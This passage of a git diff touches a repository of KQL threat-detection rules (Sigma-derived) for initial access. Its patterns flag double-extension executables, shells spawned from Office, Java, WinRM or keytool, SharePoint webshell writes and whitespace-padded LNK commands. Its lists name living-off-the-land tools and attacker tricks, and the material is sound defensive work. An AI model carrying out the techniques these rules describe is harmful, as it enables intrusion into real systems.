ProcessCommandLine contains ".txt.exe" or ProcessCommandLine contains ".txt.js" or ProcessCommandLine contains ".xls.exe" or ProcessCommandLine contains ".xls.js" or ProcessCommandLine contains ".xlsx.exe" or ProcessCommandLine contains ".xlsx.js" or ProcessCommandLine contains "⠀⠀⠀⠀⠀⠀.exe") and (FolderPath endswith " .exe" or FolderPath endswith "______.exe" or FolderPath endswith ".doc.exe" or FolderPath endswith ".doc.js" or FolderPath endswith ".docx.exe" or FolderPath endswith ".docx.js" or FolderPath endswith ".gif.exe" or FolderPath endswith ".jpeg.exe" or FolderPath endswith ".jpg.exe" or FolderPath endswith ".mkv.exe" or FolderPath endswith ".mov.exe" or FolderPath endswith ".mp3.exe" or FolderPath endswith ".mp4.exe" or FolderPath endswith ".pdf.exe" or FolderPath endswith ".pdf.js" or FolderPath endswith ".png.exe" or FolderPath endswith ".ppt.exe" or FolderPath endswith ".ppt.js" or FolderPath endswith ".pptx.exe" or FolderPath endswith ".pptx.js" or FolderPath endswith ".rtf.exe" or FolderPath endswith ".rtf.js" or FolderPath endswith ".svg.exe" or FolderPath endswith ".txt.exe" or FolderPath endswith ".txt.js" or FolderPath endswith ".xls.exe" or FolderPath endswith ".xls.js" or FolderPath endswith ".xlsx.exe" or FolderPath endswith ".xlsx.js" or FolderPath endswith "⠀⠀⠀⠀⠀⠀.exe")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql
index c04e9c5a..35e2a350 100644
--- a/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql
+++ b/KQL/rules/Initial Access/suspicious_execution_from_outlook_temporary_folder.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution From Outlook Temporary Folder
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-01
-// Level: high
-// Description: Detects a suspicious program execution in Outlook temp folder
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-
-DeviceProcessEvents
+// Title: Suspicious Execution From Outlook Temporary Folder
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-01
+// Level: high
+// Description: Detects a suspicious program execution in Outlook temp folder
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+
+DeviceProcessEvents
 | where FolderPath contains "\\Temporary Internet Files\\Content.Outlook\\"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql
index 231e4c26..f247de83 100644
--- a/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql
+++ b/KQL/rules/Initial Access/suspicious_execution_via_macos_script_editor.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Execution via macOS Script Editor
-// Author: Tim Rauch (rule), Elastic (idea)
-// Date: 2022-10-21
-// Level: medium
-// Description: Detects when the macOS Script Editor utility spawns an unusual child process.
-// MITRE Tactic: Initial Access
-// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion
-
-DeviceProcessEvents
+// Title: Suspicious Execution via macOS Script Editor
+// Author: Tim Rauch (rule), Elastic (idea)
+// Date: 2022-10-21
+// Level: medium
+// Description: Detects when the macOS Script Editor utility spawns an unusual child process.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.002, attack.initial-access, attack.t1059, attack.t1059.002, attack.t1204, attack.t1204.001, attack.execution, attack.persistence, attack.t1553, attack.defense-evasion
+
+DeviceProcessEvents
 | where ((FolderPath endswith "/curl" or FolderPath endswith "/bash" or FolderPath endswith "/sh" or FolderPath endswith "/zsh" or FolderPath endswith "/dash" or FolderPath endswith "/fish" or FolderPath endswith "/osascript" or FolderPath endswith "/mktemp" or FolderPath endswith "/chmod" or FolderPath endswith "/php" or FolderPath endswith "/nohup" or FolderPath endswith "/openssl" or FolderPath endswith "/plutil" or FolderPath endswith "/PlistBuddy" or FolderPath endswith "/xattr" or FolderPath endswith "/sqlite" or FolderPath endswith "/funzip" or FolderPath endswith "/popen") or (FolderPath contains "python" or FolderPath contains "perl")) and InitiatingProcessFolderPath endswith "/Script Editor"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
index 6607f99e..590e74ad 100644
--- a/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
+++ b/KQL/rules/Initial Access/suspicious_file_created_in_outlook_temporary_directory.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious File Created in Outlook Temporary Directory
-// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-07-22
-// Level: high
-// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.
-// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001
-// False Positives:
-// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments
-
-DeviceFileEvents
+// Title: Suspicious File Created in Outlook Temporary Directory
+// Author: Florian Roth (Nextron Systems), Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-22
+// Level: high
+// Description: Detects the creation of files with suspicious file extensions in the temporary directory that Outlook uses when opening attachments.
+// This can be used to detect spear-phishing campaigns that use suspicious files as attachments, which may contain malicious code.
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001
+// False Positives:
+// - Opening of headers or footers in email signatures that include SVG images or legitimate SVG attachments
+
+DeviceFileEvents
 | where (FolderPath endswith ".cpl" or FolderPath endswith ".hta" or FolderPath endswith ".iso" or FolderPath endswith ".rdp" or FolderPath endswith ".svg" or FolderPath endswith ".vba" or FolderPath endswith ".vbe" or FolderPath endswith ".vbs") and ((FolderPath contains "\\AppData\\Local\\Packages\\Microsoft.Outlook_" or FolderPath contains "\\AppData\\Local\\Microsoft\\Olk\\Attachments\\") or (FolderPath contains "\\AppData\\Local\\Microsoft\\Windows\\" and FolderPath contains "\\Content.Outlook\\"))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
index c5bf10b1..b820c610 100644
--- a/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
+++ b/KQL/rules/Initial Access/suspicious_file_write_to_sharepoint_layouts_directory.kql
@@ -1,11 +1,11 @@
-// Title: Suspicious File Write to SharePoint Layouts Directory
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-07-24
-// Level: high
-// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.
-// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
-
-DeviceFileEvents
+// Title: Suspicious File Write to SharePoint Layouts Directory
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-07-24
+// Level: high
+// Description: Detects suspicious file writes to SharePoint layouts directory which could indicate webshell activity or post-exploitation.
+// This behavior has been observed in the exploitation of SharePoint vulnerabilities such as CVE-2025-49704, CVE-2025-49706 or CVE-2025-53770. 
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
 | where (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\powershell_ise.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\w3wp.exe") and (FolderPath contains "\\15\\TEMPLATE\\LAYOUTS\\" or FolderPath contains "\\16\\TEMPLATE\\LAYOUTS\\") and (FolderPath endswith ".asax" or FolderPath endswith ".ascx" or FolderPath endswith ".ashx" or FolderPath endswith ".asmx" or FolderPath endswith ".asp" or FolderPath endswith ".aspx" or FolderPath endswith ".bat" or FolderPath endswith ".cmd" or FolderPath endswith ".cer" or FolderPath endswith ".config" or FolderPath endswith ".hta" or FolderPath endswith ".js" or FolderPath endswith ".jsp" or FolderPath endswith ".jspx" or FolderPath endswith ".php" or FolderPath endswith ".ps1" or FolderPath endswith ".vbs") and (FolderPath startswith "C:\\Program Files\\Common Files\\Microsoft Shared\\Web Server Extensions\\" or FolderPath startswith "C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\Web Server Extensions\\")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql
index 7ef5fc94..ff5f4e12 100644
--- a/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql
+++ b/KQL/rules/Initial Access/suspicious_hwp_sub_processes.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious HWP Sub Processes
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-10-24
-// Level: high
-// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
-
-DeviceProcessEvents
+// Title: Suspicious HWP Sub Processes
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-10-24
+// Level: high
+// Description: Detects suspicious Hangul Word Processor (Hanword) sub processes that could indicate an exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1566.001, attack.execution, attack.t1203, attack.t1059.003, attack.g0032
+
+DeviceProcessEvents
 | where FolderPath endswith "\\gbb.exe" and InitiatingProcessFolderPath endswith "\\Hwp.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
index 40924da6..d7d713a9 100644
--- a/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
+++ b/KQL/rules/Initial Access/suspicious_lnk_command_line_padding_with_whitespace_characters.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious LNK Command-Line Padding with Whitespace Characters
-// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
-// Date: 2025-03-19
-// Level: high
-// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).
-// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.
-// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.
-// This rule flags suspicious use of such padding observed in real-world attacks.
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.execution, attack.t1204.002
-
-DeviceProcessEvents
+// Title: Suspicious LNK Command-Line Padding with Whitespace Characters
+// Author: Swachchhanda Shrawan Poudel (Nextron Systems)
+// Date: 2025-03-19
+// Level: high
+// Description: Detects exploitation of LNK file command-line length discrepancy, where attackers hide malicious commands beyond the 260-character UI limit while the actual command-line argument field supports 4096 characters using whitespace padding (e.g., 0x20, 0x09-0x0D).
+// Adversaries insert non-printable whitespace characters (e.g., Line Feed \x0A, Carriage Return \x0D) to pad the visible section of the LNK file, pushing malicious commands past the UI-visible boundary.
+// The hidden payload, executed at runtime but invisible in Windows Explorer properties, enables stealthy execution and evasion—commonly used for social engineering attacks.
+// This rule flags suspicious use of such padding observed in real-world attacks. 
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.execution, attack.t1204.002
+
+DeviceProcessEvents
 | where ((ProcessCommandLine contains " " or ProcessCommandLine contains "\\u0009" or ProcessCommandLine contains "\\u000A" or ProcessCommandLine contains "\\u0011" or ProcessCommandLine contains "\\u0012" or ProcessCommandLine contains "\\u0013" or ProcessCommandLine contains "\\u000B" or ProcessCommandLine contains "\\u000C" or ProcessCommandLine contains "\\u000D") or ProcessCommandLine matches regex "\\n\\n\\n\\n\\n\\n") and (InitiatingProcessFolderPath endswith "\\explorer.exe" or InitiatingProcessCommandLine contains ".lnk")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql
index 4345d426..558923be 100644
--- a/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql
+++ b/KQL/rules/Initial Access/suspicious_microsoft_onenote_child_process.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Microsoft OneNote Child Process
-// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
-// Date: 2022-10-21
-// Level: high
-// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
-// MITRE Tactic: Initial Access
-// Tags: attack.t1566, attack.t1566.001, attack.initial-access
-// False Positives:
-// - File located in the AppData folder with trusted signature
-
-DeviceProcessEvents
+// Title: Suspicious Microsoft OneNote Child Process
+// Author: Tim Rauch (Nextron Systems), Nasreddine Bencherchali (Nextron Systems), Elastic (idea)
+// Date: 2022-10-21
+// Level: high
+// Description: Detects suspicious child processes of the Microsoft OneNote application. This may indicate an attempt to execute malicious embedded objects from a .one file.
+// MITRE Tactic: Initial Access
+// Tags: attack.t1566, attack.t1566.001, attack.initial-access
+// False Positives:
+// - File located in the AppData folder with trusted signature
+
+DeviceProcessEvents
 | where InitiatingProcessFolderPath endswith "\\onenote.exe" and (((ProcessCommandLine contains ".hta" or ProcessCommandLine contains ".vb" or ProcessCommandLine contains ".wsh" or ProcessCommandLine contains ".js" or ProcessCommandLine contains ".ps" or ProcessCommandLine contains ".scr" or ProcessCommandLine contains ".pif" or ProcessCommandLine contains ".bat" or ProcessCommandLine contains ".cmd") and FolderPath endswith "\\explorer.exe") or ((ProcessVersionInfoOriginalFileName in~ ("bitsadmin.exe", "CertOC.exe", "CertUtil.exe", "Cmd.Exe", "CMSTP.EXE", "cscript.exe", "curl.exe", "HH.exe", "IEExec.exe", "InstallUtil.exe", "javaw.exe", "Microsoft.Workflow.Compiler.exe", "msdt.exe", "MSHTA.EXE", "msiexec.exe", "Msxsl.exe", "odbcconf.exe", "pcalua.exe", "PowerShell.EXE", "RegAsm.exe", "RegSvcs.exe", "REGSVR32.exe", 
"RUNDLL32.exe", "schtasks.exe", "ScriptRunner.exe", "wmic.exe", "WorkFolders.exe", "wscript.exe")) or (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certoc.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cmstp.exe" or FolderPath endswith "\\control.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\ieexec.exe" or FolderPath endswith "\\installutil.exe" or FolderPath endswith "\\javaw.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or FolderPath endswith "\\msbuild.exe" or FolderPath endswith "\\msdt.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\msidb.exe" or FolderPath endswith "\\msiexec.exe" or FolderPath endswith "\\msxsl.exe" or FolderPath endswith "\\odbcconf.exe" or FolderPath endswith "\\pcalua.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\regasm.exe" or FolderPath endswith "\\regsvcs.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\svchost.exe" or FolderPath endswith "\\verclsid.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\workfolders.exe" or FolderPath endswith "\\wscript.exe")) or (FolderPath contains "\\AppData\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\ProgramData\\" or FolderPath contains "\\Windows\\Tasks\\" or FolderPath contains "\\Windows\\Temp\\" or FolderPath contains "\\Windows\\System32\\Tasks\\")) and (not(((ProcessCommandLine endswith "-Embedding" and FolderPath 
contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and FolderPath endswith "\\FileCoAuth.exe") or (ProcessCommandLine endswith "-Embedding" and FolderPath endswith "\\AppData\\Local\\Microsoft\\Teams\\current\\Teams.exe"))))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql
index 81f89dcd..e945ae3a 100644
--- a/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql
+++ b/KQL/rules/Initial Access/suspicious_msexchangemailboxreplication_aspx_write.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious MSExchangeMailboxReplication ASPX Write
-// Author: Florian Roth (Nextron Systems)
-// Date: 2022-02-25
-// Level: high
-// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
-
-DeviceFileEvents
+// Title: Suspicious MSExchangeMailboxReplication ASPX Write
+// Author: Florian Roth (Nextron Systems)
+// Date: 2022-02-25
+// Level: high
+// Description: Detects suspicious activity in which the MSExchangeMailboxReplication process writes .asp and .apsx files to disk, which could be a sign of ProxyShell exploitation
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.persistence, attack.t1505.003
+
+DeviceFileEvents
 | where InitiatingProcessFolderPath endswith "\\MSExchangeMailboxReplication.exe" and (FolderPath endswith ".aspx" or FolderPath endswith ".asp")
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql
index a82d0bcd..0c007948 100644
--- a/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql
+++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_java_exe.kql
@@ -1,13 +1,13 @@
-// Title: Suspicious Processes Spawned by Java.EXE
-// Author: Andreas Hunkeler (@Karneades), Florian Roth
-// Date: 2021-12-17
-// Level: high
-// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
-// False Positives:
-// - Legitimate calls to system binaries
-// - Company specific internal usage
-
-DeviceProcessEvents
+// Title: Suspicious Processes Spawned by Java.EXE
+// Author: Andreas Hunkeler (@Karneades), Florian Roth
+// Date: 2021-12-17
+// Level: high
+// Description: Detects suspicious processes spawned from a Java host process which could indicate a sign of exploitation (e.g. log4j)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+// - Legitimate calls to system binaries
+// - Company specific internal usage
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\curl.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\query.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\wscript.exe") and InitiatingProcessFolderPath endswith "\\java.exe"
\ 
No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql
index b7e7d5e8..2e57a8e9 100644
--- a/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql
+++ b/KQL/rules/Initial Access/suspicious_processes_spawned_by_winrm.kql
@@ -1,12 +1,12 @@
-// Title: Suspicious Processes Spawned by WinRM
-// Author: Andreas Hunkeler (@Karneades), Markus Neis
-// Date: 2021-05-20
-// Level: high
-// Description: Detects suspicious processes including shells spawnd from WinRM host process
-// MITRE Tactic: Initial Access
-// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
-// False Positives:
-// - Legitimate WinRM usage
-
-DeviceProcessEvents
+// Title: Suspicious Processes Spawned by WinRM
+// Author: Andreas Hunkeler (@Karneades), Markus Neis
+// Date: 2021-05-20
+// Level: high
+// Description: Detects suspicious processes including shells spawnd from WinRM host process
+// MITRE Tactic: Initial Access
+// Tags: attack.t1190, attack.initial-access, attack.persistence, attack.privilege-escalation
+// False Positives:
+// - Legitimate WinRM usage
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wsl.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe") and InitiatingProcessFolderPath endswith "\\wsmprovhost.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql
index affdbcc2..436716d6 100644
--- a/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql
+++ b/KQL/rules/Initial Access/suspicious_shells_spawn_by_java_utility_keytool.kql
@@ -1,10 +1,10 @@
-// Title: Suspicious Shells Spawn by Java Utility Keytool
-// Author: Andreas Hunkeler (@Karneades)
-// Date: 2021-12-22
-// Level: high
-// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
-
-DeviceProcessEvents
+// Title: Suspicious Shells Spawn by Java Utility Keytool
+// Author: Andreas Hunkeler (@Karneades)
+// Date: 2021-12-22
+// Level: high
+// Description: Detects suspicious shell spawn from Java utility keytool process (e.g. adselfservice plus exploitation)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.privilege-escalation
+
+DeviceProcessEvents
 | where (FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\sh.exe" or FolderPath endswith "\\bash.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\schtasks.exe" or FolderPath endswith "\\certutil.exe" or FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\bitsadmin.exe" or FolderPath endswith "\\wscript.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\scrcons.exe" or FolderPath endswith "\\regsvr32.exe" or FolderPath endswith "\\hh.exe" or FolderPath endswith "\\wmic.exe" or FolderPath endswith "\\mshta.exe" or FolderPath endswith "\\rundll32.exe" or FolderPath endswith "\\forfiles.exe" or FolderPath endswith "\\scriptrunner.exe" or FolderPath endswith "\\mftrace.exe" or FolderPath endswith "\\AppVLP.exe" or FolderPath endswith "\\systeminfo.exe" or FolderPath endswith "\\reg.exe" or FolderPath endswith "\\query.exe") and InitiatingProcessFolderPath endswith "\\keytool.exe"
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/terminal_service_process_spawn.kql b/KQL/rules/Initial Access/terminal_service_process_spawn.kql
index 57da8f94..1c04ad35 100644
--- a/KQL/rules/Initial Access/terminal_service_process_spawn.kql
+++ b/KQL/rules/Initial Access/terminal_service_process_spawn.kql
@@ -1,10 +1,10 @@
-// Title: Terminal Service Process Spawn
-// Author: Florian Roth (Nextron Systems)
-// Date: 2019-05-22
-// Level: high
-// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002
-
-DeviceProcessEvents
+// Title: Terminal Service Process Spawn
+// Author: Florian Roth (Nextron Systems)
+// Date: 2019-05-22
+// Level: high
+// Description: Detects a process spawned by the terminal service server process (this could be an indicator for an exploitation of CVE-2019-0708)
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.t1190, attack.lateral-movement, attack.t1210, car.2013-07-002
+
+DeviceProcessEvents
 | where (InitiatingProcessCommandLine contains "\\svchost.exe" and InitiatingProcessCommandLine contains "termsvcs") and (not(((FolderPath endswith "\\rdpclip.exe" or FolderPath endswith ":\\Windows\\System32\\csrss.exe" or FolderPath endswith ":\\Windows\\System32\\wininit.exe" or FolderPath endswith ":\\Windows\\System32\\winlogon.exe") or isnull(FolderPath))))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql
index 6bdfddf3..8ba2f5e3 100644
--- a/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql
+++ b/KQL/rules/Initial Access/user_added_to_remote_desktop_users_group.kql
@@ -1,12 +1,12 @@
-// Title: User Added to Remote Desktop Users Group
-// Author: Florian Roth (Nextron Systems)
-// Date: 2021-12-06
-// Level: high
-// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
-// MITRE Tactic: Initial Access
-// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001
-// False Positives:
-// - Administrative activity
-
-DeviceProcessEvents
+// Title: User Added to Remote Desktop Users Group
+// Author: Florian Roth (Nextron Systems)
+// Date: 2021-12-06
+// Level: high
+// Description: Detects addition of users to the local Remote Desktop Users group via "Net" or "Add-LocalGroupMember".
+// MITRE Tactic: Initial Access
+// Tags: attack.initial-access, attack.persistence, attack.lateral-movement, attack.t1133, attack.t1136.001, attack.t1021.001
+// False Positives:
+// - Administrative activity
+
+DeviceProcessEvents
 | where (ProcessCommandLine contains "Remote Desktop Users" or ProcessCommandLine contains "Utilisateurs du Bureau à distance" or ProcessCommandLine contains "Usuarios de escritorio remoto") and ((ProcessCommandLine contains "localgroup " and ProcessCommandLine contains " /add") or (ProcessCommandLine contains "Add-LocalGroupMember " and ProcessCommandLine contains " -Group "))
\ No newline at end of file
diff --git a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql
index 462a905a..5e5f7158 100644
--- a/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql
+++ b/KQL/rules/Initial Access/windows_registry_trust_record_modification.kql
@@ -1,12 +1,12 @@ -// Title: Windows Registry Trust Record Modification -// Author: Antonlovesdnb, Trent Liffick (@tliffick) -// Date: 2020-02-19 -// Level: medium -// Description: Alerts on trust record modification within the registry, indicating usage of macros -// MITRE Tactic: Initial Access -// Tags: attack.initial-access, attack.t1566.001 -// False Positives: -// - This will alert on legitimate macro usage as well, additional tuning is required - -DeviceRegistryEvents +// Title: Windows Registry Trust Record Modification +// Author: Antonlovesdnb, Trent Liffick (@tliffick) +// Date: 2020-02-19 +// Level: medium +// Description: Alerts on trust record modification within the registry, indicating usage of macros +// MITRE Tactic: Initial Access +// Tags: attack.initial-access, attack.t1566.001 +// False Positives: +// - This will alert on legitimate macro usage as well, additional tuning is required + +DeviceRegistryEvents | where RegistryKey contains "\\Security\\Trusted Documents\\TrustRecords" \ No newline at end of file diff --git a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql index 84ea4948..10174710 100644 --- a/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql +++ b/KQL/rules/Lateral Movement/copy_from_or_to_admin_share_or_sysvol_folder.kql 
